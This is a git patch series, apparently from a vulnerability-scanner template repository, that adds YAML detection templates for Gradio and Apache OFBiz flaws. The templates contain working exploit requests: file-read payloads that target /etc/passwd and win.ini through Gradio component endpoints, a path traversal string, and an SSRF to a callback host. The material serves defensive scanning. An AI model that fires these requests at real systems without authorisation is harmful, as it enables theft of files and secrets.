"session_hash": "aaaaaaaaaaa"} + + - | + GET /file={{download_path}} HTTP/1.1 + Host: {{Hostname}} extractors: - type: regex - name: tmpath - regex: - - \/[a-zA-Z0-9\/]+ + part: body + name: download_path internal: true + group: 1 + regex: + - "\"?([^\"]+)" - - raw: - - | - GET /file={{tmpath}} HTTP/1.1 - Host: {{Hostname}} + payloads: + path: + - c:\\windows\\win.ini + - /etc/passwd + stop-at-first-match: true + matchers-condition: and matchers: - - type: dsl - dsl: - - regex('root:.*:0:0:', body) - - 'contains(header, "text/plain")' - condition: and -# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: regex + part: body + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + - type: word + part: content_type + words: + - "text/plain" + + - type: status + status: + - 200 From c9dc98c2a0bad130c049c000a8e71afa19e34eb8 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 14 Jun 2024 23:25:40 +0530 Subject: [PATCH 0221/1841] Update CVE-2024-32113.yaml --- http/cves/2024/CVE-2024-32113.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32113.yaml b/http/cves/2024/CVE-2024-32113.yaml index 87417f7f4a..3d0724774b 100644 --- a/http/cves/2024/CVE-2024-32113.yaml +++ b/http/cves/2024/CVE-2024-32113.yaml @@ -6,14 +6,17 @@ info: severity: high description: | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13 - remediation: Users are recommended to upgrade to version 18.12.13, which fixes the issue. + remediation: | + Users are recommended to upgrade to version 18.12.13, which fixes the issue. reference: - https://issues.apache.org/jira/browse/OFBIZ-13006 - https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd - https://ofbiz.apache.org/download.html - https://ofbiz.apache.org/security.html - https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit + - https://nvd.nist.gov/vuln/detail/CVE-2024-32113 classification: + cve-id: CVE-2024-32113 epss-score: 0.00115 epss-percentile: 0.45112 metadata: From b1806b6fb260eaa55222858e0e54935ea5411742 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 15 Jun 2024 06:24:49 +0000 Subject: [PATCH 0222/1841] Auto Generated New Template Addition List [Sat Jun 15 06:24:49 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c404334baa..ea21224f0a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cloud/aws/sns/sns-public-subscribe-access.yaml +dast/vulnerabilities/sqli/time-based-sqli.yaml http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2023/CVE-2023-38194.yaml From 9f29e5483173fcda0c376083c06325f4b4279a35 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 15 Jun 2024 06:25:00 +0000 Subject: [PATCH 0223/1841] Auto Generated Templates Checksum [Sat Jun 15 06:25:00 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 02bc8e867b..f4389bbe3a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -206,11 +206,12 @@ dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d3 dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f +dast/vulnerabilities/sqli/time-based-sqli.yaml:c4fe421d55f853e08e5b3714acf730fea88960ad dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26 dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 -dast/vulnerabilities/xss/reflected-xss.yaml:cbb257b78545acfdb058780827b255ca8ac6099c +dast/vulnerabilities/xss/reflected-xss.yaml:9b4ba9125e27d15eafcbf4725bae573cdfedf52d dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0 @@ -3323,7 +3324,7 @@ http/cves/2024/CVE-2024-33724.yaml:fc5b67f9b84cdf5d6d592f2238c1fb0ef08592cc http/cves/2024/CVE-2024-3400.yaml:446beaf529f998b8b0c5957b75870f5198c21ff2 http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 -http/cves/2024/CVE-2024-37393.yaml:20d877ad8786073ac602c19cd95eacb4f8d73436 +http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-4040.yaml:87622a19f81053e7b7bfdf1fdce706db759cc310 http/cves/2024/CVE-2024-4348.yaml:4b01ceded94fa6f15d3037f21c83953c37fef181 @@ -5288,7 +5289,7 @@ http/misconfiguration/apache/apache-couchdb-unauth.yaml:f1a42febc03d40ab2eb27519 http/misconfiguration/apache/apache-filename-enum.yaml:00fec57e8abf4422bb9223a4f1ce706b023f0eef http/misconfiguration/apache/apache-hbase-unauth.yaml:73f22979593c54310c2145d482018010663fe9a2 http/misconfiguration/apache/apache-nifi-unauth.yaml:4e19b0b31aea4665b8ca4fa4c2aa6380182ce120 -http/misconfiguration/apache/apache-server-status-localhost.yaml:66cb8088785ba5ec211abc13b82eeef13a4a1213 +http/misconfiguration/apache/apache-server-status-localhost.yaml:ed27964d3819446bb04a4095a3edf2ae58872cba http/misconfiguration/apache/apache-server-status.yaml:1afd6683f4ff99098d2c8a81ea650f1be4a81926 http/misconfiguration/apache/apache-storm-unauth.yaml:a4e0f588e65474220083ff0960511fc324b4f139 http/misconfiguration/apache/apache-zeppelin-unauth.yaml:18859a2711b1796228e38d53e2588c4a211e33d4 @@ -8646,7 +8647,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:73a443496d5bda8552e1e38ab4b09951ff8b0139 +templates-checksum.txt:aee4483334152b00476fbff1244b62e7fb394373 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4eed56123c829b84173c0b2f9bf74a0966d55cce Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 15 Jun 2024 06:25:41 +0000 Subject: [PATCH 0224/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a7dd741cba..d16a18ad39 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'cloud/aws/sns/sns-public-subscribe-access.yaml' + - 'dast/vulnerabilities/sqli/time-based-sqli.yaml' - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' From d9e4952953a9245bddfe19e1f607a2863ba37963 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 15 Jun 2024 06:26:50 +0000 Subject: [PATCH 0225/1841] Auto Template Signing [Sat Jun 15 06:26:50 UTC 2024] :robot: --- dast/vulnerabilities/sqli/time-based-sqli.yaml | 1 + dast/vulnerabilities/xss/reflected-xss.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/dast/vulnerabilities/sqli/time-based-sqli.yaml b/dast/vulnerabilities/sqli/time-based-sqli.yaml index 4256dcd6b7..3b7946edbf 100644 --- a/dast/vulnerabilities/sqli/time-based-sqli.yaml +++ b/dast/vulnerabilities/sqli/time-based-sqli.yaml @@ -47,3 +47,4 @@ http: - type: dsl dsl: - "duration>=7 && duration <=16" +# digest: 4a0a00473045022100d675885ab7a3077f93b0db61d16c0c497b081929390f70eaf3f83176718297bc0220757a070de885db66f2a5855ee6ae327d14d04b04f0ce5cfc27db288563341cfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index b0cae4deb0..708bc86415 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -42,3 +42,4 @@ http: part: header words: - "text/html" +# digest: 4b0a00483046022100fe9d1b6a33bc101017c0dabac57b282164ad7a316747fb641b1be7dd534178b2022100b1b90ca968e766279c306212b849ce875ae2beaced34248794387b56192c1878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 71619b57b46032c8fffc8675444c4744a30316e4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 15 Jun 2024 12:50:50 +0530 Subject: [PATCH 0226/1841] minor update --- http/cves/2024/CVE-2024-1561.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index 251ad54ade..9d02bce5b1 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -1,11 +1,11 @@ id: CVE-2024-1561 info: - name: Gradio Applications - Local File Read + name: Gradio 4.3-4.12 - Local File Read author: nvn1729,Diablo severity: high description: | - Local file read by calling arbitrary methods of Components class + Local file read by calling arbitrary methods of Components class between Gradio versions 4.3-4.12 impact: | Successful exploitation of this vulnerability could allow an attacker to read files on the server remediation: | From 53a8336abbe1471942f17b24d27bce2dbabf9c3a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 15 Jun 2024 13:26:34 +0530 Subject: [PATCH 0227/1841] Create CVE-2024-1561-3x.yaml --- http/cves/2024/CVE-2024-1561-3x.yaml | 82 ++++++++++++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1561-3x.yaml diff --git a/http/cves/2024/CVE-2024-1561-3x.yaml b/http/cves/2024/CVE-2024-1561-3x.yaml new file mode 100644 index 0000000000..63db3111e2 --- /dev/null +++ b/http/cves/2024/CVE-2024-1561-3x.yaml @@ -0,0 +1,82 @@ +id: CVE-2024-1561-3x + +info: + name: Gradio 3.47 – 3.50.2 - Local File Inclusion + author: nvn1729 + severity: high + description: | + Local file read by calling arbitrary methods of Components class between Gradio versions 3.47 – 3.50.2 + reference: + - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 + - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + epss-percentile: 0.36659 + metadata: + verified: true + max-request: 2 + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr + +http: + - raw: + - | + POST /component_server HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"component_id": "{{fuzz_component_id}}", "data": "{{path}}", "fn_name": "make_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"} + + - | + GET /file={{download_path}} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: body + name: download_path + internal: true + group: 1 + regex: + - "\"?([^\"]+)" + + attack: clusterbomb + payloads: + fuzz_component_id: + - 1 + - 2 + - 3 + - 4 + - 5 + - 6 + - 7 + - 8 + - 9 + - 10 + - 11 + - 12 + - 13 + - 14 + - 15 + - 16 + - 17 + - 18 + - 19 + - 20 + path: + - c:\\windows\\win.ini + - /etc/passwd + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + - type: status + status: + - 200 From 0f43b7a3dd8279898a8beadcb307307795581d35 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 15 Jun 2024 13:31:02 +0530 Subject: [PATCH 0228/1841] fix trail space --- http/cves/2024/CVE-2024-1561-3x.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1561-3x.yaml b/http/cves/2024/CVE-2024-1561-3x.yaml index 63db3111e2..0c53c6fe60 100644 --- a/http/cves/2024/CVE-2024-1561-3x.yaml +++ b/http/cves/2024/CVE-2024-1561-3x.yaml @@ -67,7 +67,7 @@ http: path: - c:\\windows\\win.ini - /etc/passwd - + stop-at-first-match: true matchers-condition: and matchers: From e83f7471c5c2d88723882f9892733c2f8e4e3829 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 15 Jun 2024 14:41:04 +0530 Subject: [PATCH 0229/1841] Create CVE-2024-1561-3x-ssrf.yaml (Gradio 3.47 - 3.50.2 - Server Side Request Forgery) --- http/cves/2024/CVE-2024-1561-3x-ssrf.yaml | 77 +++++++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1561-3x-ssrf.yaml diff --git a/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml b/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml new file mode 100644 index 0000000000..0a50b5edcf --- /dev/null +++ b/http/cves/2024/CVE-2024-1561-3x-ssrf.yaml @@ -0,0 +1,77 @@ +id: CVE-2024-1561-3x-ssrf + +info: + name: Gradio 3.47 - 3.50.2 - Server Side Request Forgery + author: nvn1729 + severity: high + description: | + Gradio Full Read SSRF when auth is not enabled, this version should work for versions 3.47 - 3.50.2. + reference: + - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 + - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + epss-percentile: 0.36659 + metadata: + verified: true + max-request: 2 + shodan-query: html:"__gradio_mode__" + tags: cve,cve2024,unauth,gradio,ssrf + +http: + - raw: + - | + POST /component_server HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"component_id": "{{fuzz_component_id}}", "data": "http://{{interactsh-url}}", "fn_name": "download_temp_copy_if_needed", "session_hash": "aaaaaaaaaaa"} + + - | + GET /file={{download_path}} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: body + name: download_path + internal: true + group: 1 + regex: + - "\"?([^\"]+)" + + payloads: + fuzz_component_id: + - 1 + - 2 + - 3 + - 4 + - 5 + - 6 + - 7 + - 8 + - 9 + - 10 + - 11 + - 12 + - 13 + - 14 + - 15 + - 16 + - 17 + - 18 + - 19 + - 20 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - [a-z0-9]+ + + - type: status + status: + - 200 From 6b057d4926f7d34fbc7bcb03f2a4ff29187594d2 Mon Sep 17 00:00:00 2001 From: isacaya <114328108+isacaya@users.noreply.github.com> Date: Sat, 15 Jun 2024 21:36:40 +0900 Subject: [PATCH 0230/1841] Create CVE-2024-1728.yaml --- http/cves/2024/CVE-2024-1728.yaml | 73 +++++++++++++++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 http/cves/2024/CVE-2024-1728.yaml diff --git a/http/cves/2024/CVE-2024-1728.yaml b/http/cves/2024/CVE-2024-1728.yaml new file mode 100644 index 0000000000..ea0a1de886 --- /dev/null +++ b/http/cves/2024/CVE-2024-1728.yaml @@ -0,0 +1,73 @@ +id: CVE-2024-1728 + +info: + name: Local File Inclusion in Gradio + author: isacaya + severity: high + description: | + Improper validation of user-supplied input in the UploadButton component leads to an LFI vulnerability. + impact: | + An attacker would be able to view the contents of a file on the computer. + remediation: | + Update to version 4.19.2. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-1728 + - https://github.com/gradio-app/gradio/commit/16fbe9cd0cffa9f2a824a0165beb43446114eec7 + - https://huntr.com/bounties/9bb33b71-7995-425d-91cc-2c2a2f2a068a + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-1728 + metadata: + vendor: Gradio + product: Gradio + shodan-query: title:"Gradio" + tags: cve,cve2024,lfi,Gradio,traversal + +http: + - raw: + - | + POST /queue/join? HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"data":[[{"path":"{{path}}","url":"{{BaseURL}}/file=/help","orig_name":"CHANGELOG.md","size":3549, + "mime_type":"text/markdown"}]],"event_data":null,"fn_index":0,"trigger_id":2,"session_hash":"{{randstr}}"} + + - | + GET /queue/data?session_hash={{randstr}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET /file=§extracted_path§ HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + internal: true + regex: + - "C:.*\\win\\.ini" + - "/tmp/gradio/.*/passwd" + name: extracted_path + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - "status_code == 200" + condition: and + + - type: dsl + dsl: + - "contains(body, 'bit app support')" + - "contains(body, 'fonts')" + - "contains(body, 'extensions')" + - "status_code == 200" + condition: and + + payloads: + path: + - /etc/passwd + - /windows/win.ini \ No newline at end of file From 9065e8aca23ea1fa38e26cebfb189520f5d2b06d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 15 Jun 2024 18:10:20 +0530 Subject: [PATCH 0231/1841] Update CVE-2023-51449.yaml --- http/cves/2023/CVE-2023-51449.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-51449.yaml b/http/cves/2023/CVE-2023-51449.yaml index ccc16826fe..bb20130a91 100644 --- a/http/cves/2023/CVE-2023-51449.yaml +++ b/http/cves/2023/CVE-2023-51449.yaml @@ -1,14 +1,14 @@ id: CVE-2023-51449 info: - name: Gradio Hugging Face - Unauthenticated Local File Inclusion + name: Gradio Hugging Face - Local File Inclusion author: nvn1729 severity: high description: | Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33 reference: - - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2 - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/ + - https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2 - https://nvd.nist.gov/vuln/detail/CVE-2023-51449 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N @@ -24,7 +24,7 @@ info: vendor: gradio_project product: gradio framework: python - shodan-query: html="__gradio_mode__" + shodan-query: html:"__gradio_mode__" fofa-query: body="__gradio_mode__" tags: cve,cve2024,lfi,gradio,unauth,intrusive From 524efd9fb84858e17dda487de8fae0a009d2ebe9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 15 Jun 2024 12:41:06 +0000 Subject: [PATCH 0232/1841] Auto Generated New Template Addition List [Sat Jun 15 12:41:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ea21224f0a..dc916c44ab 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2023/CVE-2023-6505.yaml http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-23692.yaml +http/cves/2024/CVE-2024-32113.yaml http/cves/2024/CVE-2024-37393.yaml http/exposed-panels/lorex-panel.yaml http/exposed-panels/oracle-application-server-panel.yaml From 5f0e91b36ad751f11efbac605a2617fe17ff9927 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 15 Jun 2024 12:41:11 +0000 Subject: [PATCH 0233/1841] Auto Generated Templates Checksum [Sat Jun 15 12:41:11 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f4389bbe3a..cd82cdfd1c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -206,12 +206,12 @@ dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:218f24aa37dd58a83d33318e22794a3d3 dast/vulnerabilities/redirect/open-redirect.yaml:4fa1fca9a4a36c7fd81faafd3f7bf474b4efa471 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:13195b21140da0c8c21d2580efe17d40536dc75f -dast/vulnerabilities/sqli/time-based-sqli.yaml:c4fe421d55f853e08e5b3714acf730fea88960ad +dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 dast/vulnerabilities/ssrf/blind-ssrf.yaml:12e23b0638b7f0121088e6e0b9ed906a37a6fe26 dast/vulnerabilities/ssrf/response-ssrf.yaml:7860ce6af5f3856162386fc7c86d2da2ec4ed661 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 -dast/vulnerabilities/xss/reflected-xss.yaml:9b4ba9125e27d15eafcbf4725bae573cdfedf52d +dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0 @@ -3314,6 +3314,7 @@ http/cves/2024/CVE-2024-31848.yaml:7897724f33b3fb2247e15f6c2904421c54586c6c http/cves/2024/CVE-2024-31849.yaml:3959023f6bd03c1ab24b2e711acd4683c98d8dbe http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690 +http/cves/2024/CVE-2024-32113.yaml:db95c4c233c638afaef0c1165c9701956d1f7754 http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c @@ -8647,7 +8648,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:aee4483334152b00476fbff1244b62e7fb394373 +templates-checksum.txt:0cd315bf4cdcba6e0f732f410530100428a746c4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7c436d5b58bb51fb193143f25379cf4d0864d5fe Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sat, 15 Jun 2024 12:41:47 +0000 Subject: [PATCH 0234/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d16a18ad39..824546859a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -13,6 +13,7 @@ on: - 'http/cves/2023/CVE-2023-6786.yaml' - 'http/cves/2024/CVE-2024-0250.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' + - 'http/cves/2024/CVE-2024-32113.yaml' - 'http/cves/2024/CVE-2024-37393.yaml' - 'http/exposed-panels/lorex-panel.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' From 0448235ddc28cfa9309468a863362e5cee711f14 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 15 Jun 2024 12:43:13 +0000 Subject: [PATCH 0235/1841] Auto Template Signing [Sat Jun 15 12:43:13 UTC 2024] :robot: --- http/cves/2024/CVE-2024-32113.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-32113.yaml b/http/cves/2024/CVE-2024-32113.yaml index 3d0724774b..52e7b6c50c 100644 --- a/http/cves/2024/CVE-2024-32113.yaml +++ b/http/cves/2024/CVE-2024-32113.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100b88041381f7eeda038aa86589d4e8abaa41ddf477aafea6cd9271bdafa02ebb6022100dfb966a119b54853c7b4d4ea44205600d7bf2227910f32cd964a08a2cf91571d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7c5a294b9b89e224bdae03639c163d7f1a019e37 Mon Sep 17 00:00:00 2001 From: isacaya <114328108+isacaya@users.noreply.github.com> Date: Sat, 15 Jun 2024 21:43:59 +0900 Subject: [PATCH 0236/1841] Create CVE-2021-43831.yaml --- http/cves/2021/CVE-2021-43831.yaml | 52 ++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2021/CVE-2021-43831.yaml diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml new file mode 100644 index 0000000000..85711779f2 --- /dev/null +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-43831 + +info: + name: Arbitrary File Read in Gradio + author: isacaya + severity: high + description: | + Files on the host computer can be accessed from the Gradio interface + impact: | + An attacker would be able to view the contents of a file on the computer. + remediation: | + Update to version 2.5.0. + reference: + - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr + - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781 + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L + cvss-score: 8.3 + cve-id: CVE-2021-43831 + cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* + metadata: + vendor: Gradio + product: Gradio + shodan-query: title:"Gradio" + tags: cve,cve2021,lfi,Gradio,traversal + +http: + - method: GET + path: + - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}" + + payloads: + path: + - /etc/passwd + - /windows/win.ini + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + dsl: + - "regex('root:.*:0:0:', body)" + - "status_code == 200" + condition: and + + - type: dsl + dsl: + - "contains(body, 'bit app support')" + - "contains(body, 'fonts')" + - "contains(body, 'extensions')" + - "status_code == 200" + condition: and \ No newline at end of file From 0fca79694bc51ba05c08b0fd8685aac359714b42 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Sat, 15 Jun 2024 18:31:49 +0300 Subject: [PATCH 0237/1841] add cve-2024-3922 --- http/cves/2024/CVE-2024-3922.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3922.yaml diff --git a/http/cves/2024/CVE-2024-3922.yaml b/http/cves/2024/CVE-2024-3922.yaml new file mode 100644 index 0000000000..c38b4e98aa --- /dev/null +++ b/http/cves/2024/CVE-2024-3922.yaml @@ -0,0 +1,26 @@ +id: CVE-2024-3922 +info: + name: Dokan Pro <= 3.10.3 SQL Injection + author: securityforeveryone + severity: critical + description: | + The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - 